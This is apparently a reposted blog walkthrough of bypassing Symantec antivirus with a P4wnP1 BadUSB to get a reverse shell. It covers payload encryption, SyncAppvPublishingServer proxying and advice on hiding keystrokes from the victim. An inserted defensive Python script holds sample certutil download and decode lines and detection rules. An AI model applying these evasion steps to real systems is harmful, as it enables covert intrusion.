
Example Analysis of Antivirus Bypass with P4wnP1 USB against Symantec

2025-04-12 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

This article walks through an example of bypassing Symantec antivirus with a P4wnP1 USB device. The content is concise and easy to follow, and I hope you take something away from the detailed write-up.

Recently, I used the P4wnP1 image to turn my Raspberry Pi Zero W into a BadUSB device. My ultimate goal was to run a remote command shell while bypassing the latest version of Symantec SEP with CompleteCare enabled. I could easily obtain a remote shell by creating my own payload, but executing it was difficult because of the advanced SONAR and IPS detection features that Symantec provides. To solve this problem, all you have to do is encrypt the payload, because Symantec will then be unable to analyze it.

Before we officially begin, I suggest you read the following articles about antivirus bypass:

http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/

https://gbhackers.com/malicious-payload-evasion-techniques/

https://www.shellterproject.com/

Experimental environment and equipment requirements:

Raspberry Pi Zero W and an SD card

Pi Zero W USB-A addon board (https://www.amazon.com/MakerFocus-Raspberry-Required-Provide-Connector/dp/B077W69CD1 and http://www.raspberrypiwiki.com/index.php/Raspberry_Pi_Zero_W_USB-A_Addon_Board)

A laptop used as the attacking machine; in this article its IP is 192.168.1.106.

A Windows 10 machine with Symantec SEP CompleteCare enabled

Set up P4wnP1

I won't explain the setup of P4wnP1 USB here, because several articles have already covered it in detail. You can refer to the official git repository https://github.com/mame82/P4wnP1_aloa and the wiki https://p4wnp1.readthedocs.io/en/latest/.

For this setup, I changed the following important settings:

Hotspot name

USB HID attack script

Some pictures of the final device follow.

Victim machine

My test machine runs trial versions of Windows 10.0.16299.125 and Symantec Endpoint Protection 14.2.

I also made sure that UAC was left enabled at its default setting.

Attacking machine

I use my customized Ubuntu machine for penetration testing. One caveat of this test is that I could only connect from the same network. You can hide your connection and route it outbound through a port such as 443, which is usually allowed on corporate networks with little filtering.

Attacking the target: the payload

Obfuscation plays an important role in avoiding payload detection. I like to use C# or C to create my own payloads. There is an excellent article on this area at https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15. For this particular example, I used a simple C# payload whose source code was written by the above author and is hosted on GitHub.

Remember to make the minor changes needed for the IP and port of the attacking machine. I will use port 443 for testing.

I ran a test on the victim machine and was surprised that Symantec did not detect it.

Payload Delivery

Transferring the payload is not easy. Symantec's SONAR closely monitors PowerShell and the command prompt and seemed to detect all of my actions.

I tried using certutil to fetch the payload from a website hosted on my local network server. Another approach was to encode the payload as base64 and use certutil to decode it. Both failed.

In the end, I used a very simple technique: executing the code through the running SyncAppvPublishingServer. You can find a detailed description of this technique and similar ones here. It also allowed me to completely evade Symantec's monitoring of PowerShell.

Transfer payload

I used a simple command to download the payload through the PowerShell session that had evaded detection, and the custom payload also evaded detection. After download, the file is run from the user's profile directory. Let's turn our attention to the following code.
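From the defender's side, every step of the delivery chain described in this section leaves a process or network event that endpoint telemetry can catch: certutil used as a downloader or base64 decoder, a script host running SyncAppvPublishingServer.vbs, PowerShell launching a binary out of the user profile, and that binary connecting out on 443. The following is an added example, not code from the original post or from the P4wnP1 project: a small rule set run over Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records. The field names, the rule thresholds, and all sample events (including the file names and the 203.0.113.10 address) are constructed assumptions for illustration; only 192.168.1.106 comes from the post.

```python
"""Hunting rules for the delivery chain above, run over constructed
Sysmon-style events. Field subsets mirror Event ID 1 (Image, ParentImage,
CommandLine) and Event ID 3 (Image, DestinationIp, DestinationPort, Initiated).
All sample events are constructed for illustration, not captured logs."""
from dataclasses import dataclass


@dataclass
class ProcEvent:            # Sysmon Event ID 1 subset (assumed field names)
    image: str
    parent_image: str
    command_line: str


@dataclass
class NetEvent:             # Sysmon Event ID 3 subset (assumed field names)
    image: str
    dest_ip: str
    dest_port: int
    initiated: bool = True


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def in_user_profile(path: str) -> bool:
    """True for executables living under the user profile tree."""
    return path.lower().startswith("c:\\users\\")


def rule_appv_proxy(ev: ProcEvent):
    """SyncAppvPublishingServer (.vbs via a script host, or the .exe with
    arguments) used as a proxy to run PowerShell code without powershell.exe
    on the command line. Legitimate App-V hosts can trigger this, so treat
    hits as hunt leads rather than verdicts."""
    cl = ev.command_line.lower()
    name = basename(ev.image)
    if name in ("wscript.exe", "cscript.exe") and "syncappvpublishingserver.vbs" in cl:
        return "script host running SyncAppvPublishingServer.vbs"
    if name == "syncappvpublishingserver.exe" and len(cl.split(None, 1)) > 1:
        return "SyncAppvPublishingServer.exe launched with arguments"
    return None


def rule_certutil(ev: ProcEvent):
    """certutil as downloader (-urlcache) or base64 decoder (-decode), the two
    delivery attempts the post says Symantec blocked."""
    if basename(ev.image) != "certutil.exe":
        return None
    cl = ev.command_line.lower()
    if "-urlcache" in cl:
        return "certutil used to fetch a remote file"
    if "-decode" in cl:
        return "certutil used to base64-decode a file"
    return None


def rule_user_profile_exec(ev: ProcEvent):
    """PowerShell launching an executable that lives in the user profile."""
    if basename(ev.parent_image) in ("powershell.exe", "pwsh.exe") and in_user_profile(ev.image):
        return "PowerShell spawned a binary from the user profile"
    return None


def rule_user_profile_egress(ev: NetEvent):
    """Binary under the user profile opening an outbound connection on a web
    port (443 in the post), consistent with a reverse shell riding allowed egress."""
    if ev.initiated and in_user_profile(ev.image) and ev.dest_port in (80, 443, 8080):
        return f"user-profile binary connected out to {ev.dest_ip}:{ev.dest_port}"
    return None


PROC_RULES = (rule_appv_proxy, rule_certutil, rule_user_profile_exec)


def evaluate(events):
    """Return [(event index, rule name, message)] for every rule hit."""
    hits = []
    for i, ev in enumerate(events):
        rules = PROC_RULES if isinstance(ev, ProcEvent) else (rule_user_profile_egress,)
        for rule in rules:
            msg = rule(ev)
            if msg:
                hits.append((i, rule.__name__, msg))
    return hits


SAMPLE_EVENTS = [  # constructed telemetry; paths and names are placeholders
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              "certutil -urlcache -f http://192.168.1.106/file.bin file.bin"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              "certutil -decode file.b64 file.bin"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
              r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "<constructed argument>"'),
    ProcEvent(r"C:\Users\victim\AppData\Local\Temp\update.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "update.exe"),
    NetEvent(r"C:\Users\victim\AppData\Local\Temp\update.exe", "192.168.1.106", 443),
    NetEvent(r"C:\Program Files\Browser\browser.exe", "203.0.113.10", 443),  # benign control
]

if __name__ == "__main__":
    for index, rule_name, message in evaluate(SAMPLE_EVENTS):
        print(f"event {index}: {rule_name}: {message}")
```

Run stand-alone, the script flags events 1 to 5 and stays silent on the benign explorer and browser events. The rules are deliberately narrow: in an environment that actually uses App-V, rule_appv_proxy should be scoped to hosts where the service is not expected, and the user-profile rules should be paired with the Windows Event 4104 script block log, since SyncAppvPublishingServer hosts PowerShell in-process and does not necessarily spawn powershell.exe.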

Get shell

To complete the attack, I set up the BadUSB to execute the command. Here are some pictures of my setup. I connected to the BadUSB over WiFi from my Android phone. Symantec did not detect it because it was not presented as a USB storage device; it was used as a keyboard.

The HID script is set to wait for the user to press the Num Lock key repeatedly; you can modify when and how it executes according to your own preferences. Be careful! Whatever the USB HID device types will be visible on the screen, and you have to make sure the user does not notice it or become suspicious.

The HID script I set up is as follows:

After execution, I got a remote shell.

Update: other AV solutions

Based on the feedback I received, I tested some other solutions.

So far, Windows Defender has shown a very strong ability to detect the attack, as shown below.

Windows Defender

Symantec

Plans for the future

Use a C-based persistent payload delivery

Modify the HID script to make it more covert

That concludes the example analysis of P4wnP1 USB and Symantec antivirus bypass.
